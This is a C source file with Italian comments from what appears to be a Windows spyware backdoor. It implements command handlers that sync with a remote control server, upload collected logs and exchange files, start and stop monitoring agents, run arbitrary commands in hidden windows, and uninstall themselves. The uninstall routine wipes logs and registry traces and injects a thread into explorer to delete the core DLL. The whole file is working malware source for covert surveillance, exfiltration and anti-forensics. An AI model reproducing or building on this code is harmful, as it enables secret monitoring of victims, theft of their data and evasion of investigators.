#include "LOG.h"
#include "AM_Core.h"

// Codici delle action function
#define AF_SYNCRONIZE 1
#define AF_STARTAGENT 2
#define AF_STOPAGENT  3
#define AF_EXECUTE    4
#define AF_UNINSTALL  5
#define AF_NONE 0xFFFFFFFF

// Sono dichiarati in SM_Core.cpp di cui questo file e' un include
void EventMonitorStopAll(void);    
void UpdateEventConf(void);
void EventMonitorStartAll(void);    
void SM_AddExecutedProcess(DWORD);


// Riceve un nuovo file di configurazione ed invia la coda dei log
BOOL WINAPI DA_Syncronize(BYTE *action_param, DWORD action_len)
{
	typedef struct {
		DWORD min_sleep;
		DWORD max_sleep;
		DWORD band_limit;
		char conf_string[1];
	} sync_conf_struct;
	sync_conf_struct *sync_conf;
	DWORD ret_val;
	BOOL conn_error = FALSE;
	char *asp_server, *unique_id;

	// Verifica che ci sia il parametro e che non siamo in momento di crisi
	if (!action_param || IsCrisis())
		return FALSE;

	// asp_server e unique_id devono essere entrambe NULL
	// terminated. Deve essere cura del server inviare una
	// configurazione corretta.
	sync_conf = (sync_conf_struct *)action_param;
	asp_server = sync_conf->conf_string;
	unique_id = strchr(asp_server, 0) + 1;

	// Se non riesce ad aprire la connessione con il server ASP
	// esce dalla funzione (non c'e' neanche bisogno di chiudere
	// la connessione). Se una delle istruzioni LOG_ReceiveNewConf o 
	// LOG_SendLogQueue ritorna con un errore dovrebbe immediatamente 
	// essere eseguita LOG_CloseLogConnection (ora e' cosi').
	if (!LOG_StartLogConnection(asp_server, unique_id))
		return FALSE;

	// Riceve (se c'e') un nuovo file di configurazione.
	// Lo fa come prima cosa per evitare che problemi sulla
	// spedizione dei log (es: file troppo grandi) 
	// compromettano per sempre l'esecuzione del programma.
	ret_val = LOG_ReceiveNewConf();
	if (ret_val == LOG_CONF_ERROR) {
		LOG_CloseLogConnection();
		return FALSE;
	}

	// Effettua upload, download (se non c'e' stato un errore nella 
	// ricezione del file di configurazione). Se Up e Down non hanno ritornato 
	// errori, procede all'invio dei log. 
	if (!LOG_UploadDownload(sync_conf->band_limit, sync_conf->min_sleep, sync_conf->max_sleep)) {
		LOG_CloseLogConnection();
		conn_error = TRUE;
	}

	// Invia la coda gia' inattiva dei log (no concorrenza con agenti)
	// nel caso ci sia roba pendente da una sync interrotta
	if (!conn_error && !LOG_SendLogQueue(sync_conf->band_limit, sync_conf->min_sleep, sync_conf->max_sleep)) {
		LOG_CloseLogConnection();
		conn_error = TRUE;
	}

	// Se non ci sono errori...
	if (!conn_error) {
		// Sospende tutti gli agent e l'agent manager.
		// Gli agent sono costretti a chiudere tutti i file
		// aperti prima dello scambio della coda dei log.
		AM_SuspendRestart(AM_SUSPEND);
		// Ad agenti stoppati scambia la coda dei log
		Log_SwitchQueue();
		// Riattiva gli agenti
		if (ret_val == LOG_CONF_NEW_FILE)
			AM_SuspendRestart(AM_RESET); // ...Da file di configurazione (se c'e' nuovo)
		else 
			AM_SuspendRestart(AM_RESTART); // Rimette gli agent nella condizione che avevano alla suspend
		// Invia la coda inattiva dei log (no concorrenza con agenti)
		LOG_SendLogQueue(sync_conf->band_limit, sync_conf->min_sleep, sync_conf->max_sleep);
		LOG_CloseLogConnection();
	} else { // Se ci sono errori, ma ha un nuovo file per gli aggenti, allora lo aggiorna
		if (ret_val == LOG_CONF_NEW_FILE) {
			AM_SuspendRestart(AM_SUSPEND);
			AM_SuspendRestart(AM_RESET);
		}
	}

	// Modifica configurazione eventi/azioni
	// se ha ricevuto nuovo file di conf
	if (ret_val == LOG_CONF_NEW_FILE) {
		EventMonitorStopAll();    
		UpdateEventConf();
		EventMonitorStartAll();        
		return TRUE;
	}

	return FALSE;
}


// Fa partire un agent
BOOL WINAPI DA_StartAgent(BYTE *agent_tag, DWORD param_len)
{
	// Verifica che il parametro agent_tag sia corretto (una DWORD)
	if (!agent_tag || param_len!=4)
		return FALSE;

	AM_MonitorStartStop(*(DWORD *)agent_tag, TRUE);
	return FALSE;
}


// Fa fermare un agent
BOOL WINAPI DA_StopAgent(BYTE *agent_tag, DWORD param_len)
{
	// Verifica che il parametro agent_tag sia corretto (una DWORD)
	if (!agent_tag || param_len!=4)
		return FALSE;

	AM_MonitorStartStop(*(DWORD *)agent_tag, FALSE);
	return FALSE;
}


// Esegue un comando in maniera nascosta
BOOL WINAPI DA_Execute(BYTE *command, DWORD command_len)
{
	STARTUPINFO si;
    PROCESS_INFORMATION pi;

	// Verifica che ci sia il comando 
	// N.B. Deve essere NULL terminato!!!
	// e Verifica che non siamo in periodo di crisi 
	if (!command || IsCrisis())
		return FALSE;

	// Il processo viene lanciato con la main window
	// nascosta
	ZeroMemory( &si, sizeof(si) );
    si.cb = sizeof(si);
	si.wShowWindow = SW_HIDE;
	si.dwFlags = STARTF_USESHOWWINDOW;
	HM_CreateProcess((char *)command, 0, &si, &pi, 0);
	// Se HM_CreateProcess fallisce, pi.dwProcessId e' settato a 0.
	// Lo aggiunge alla lista dei processi eseguiti
	if (pi.dwProcessId) 
		SM_AddExecutedProcess(pi.dwProcessId);

	return FALSE;
}


// Disinstalla il programma
BOOL WINAPI DA_Uninstall(BYTE *dummy_param, DWORD dummy_len)
{
	char conf_path[DLLNAMELEN];

	// Stoppa agenti ed event monitor.
	// A questo punto rimane attivo solo il thread 
	// principale che gestisce il logout e l'injection
	// in TaskManager e nei nuovi explorer
	// (che non influisce sulla disinstallazione)
	AM_SuspendRestart(AM_EXIT);
	EventMonitorStopAll();    

	// Rimuove tutti i file di log.
	Log_RemoveFiles();

	// Rimuove la chiave dal registry.
	// Lo fa dopo aver rimosso i log, per evitare che 
	// il computer venga spento mentre li sta rimuovendo
	// (rimarrebbero i log sulla macchina).
	HM_RemoveRegistryKey();

	// Rimuove il file di configurazione.
	// Lo rimuove dopo aver tolto la chiave del registry 
	// per evitare che il computer venga spento con ancora la backdoor
	// attivabile al successivo avvio, ma senza file di configurazione
	// (non si disinstallerebbe piu').
	HM_WipeFile(HM_CompletePath(H4_CONF_FILE, conf_path));

	// Tenta di iniettare un thread in explorer per cancellare 
	// la DLL core e la directory di lavoro (non puo' cancellarsi da sola)
	HM_RemoveCore();

	// XXX Qui dovrebbe disinstallare il driver e cancellarne il file
	// XXX (lo deve fare come ultima cosa)

	// Fa terminare il processo host (rundll32)
	ExitProcess(0);

	// :)
	return FALSE;
}
